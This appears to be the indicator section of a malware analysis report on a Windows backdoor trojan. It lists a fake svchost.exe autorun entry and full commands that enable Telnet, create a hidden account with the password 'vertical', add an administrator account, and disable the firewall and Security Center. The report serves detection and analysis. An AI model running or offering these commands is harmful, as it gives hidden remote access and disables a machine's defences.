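Technical Information (in the entries below, <HKLM> stands for the HKEY_LOCAL_MACHINE registry hive and <SYSTEM32> for the Windows system directory)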
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'Driver' = '<SYSTEM32>\Sys\svchost.exe' (autorun entry; the genuine svchost.exe resides directly in <SYSTEM32>, not in a 'Sys' subfolder)
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (start type 2 sets the Telnet service to start automatically at boot)
- <SYSTEM32>\tlntsvr.exe
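- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Enter /t REG_DWORD /d 0 /f (a value of 0 under SpecialAccounts\UserList hides the 'Enter' account from the Windows logon screen)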
- <SYSTEM32>\sc.exe start tlntsvr
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\net1.exe localgroup Администраторы login /add ('Администраторы' is the name of the local Administrators group on Russian-language Windows)
- <SYSTEM32>\net1.exe user Enter vertical /add /expires:never /times:all
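- <SYSTEM32>\sc.exe config SharedAccess start= disabled (on Windows XP, SharedAccess is the Windows Firewall/Internet Connection Sharing service)
- <SYSTEM32>\sc.exe config wscsvc start= disabled (wscsvc is the Windows Security Center service)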
- <SYSTEM32>\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v Driver /t REG_SZ /d <SYSTEM32>\Sys\svchost.exe /f
- <SYSTEM32>\sc.exe stop SharedAccess
- <SYSTEM32>\sc.exe stop wscsvc
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- 'localhost':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''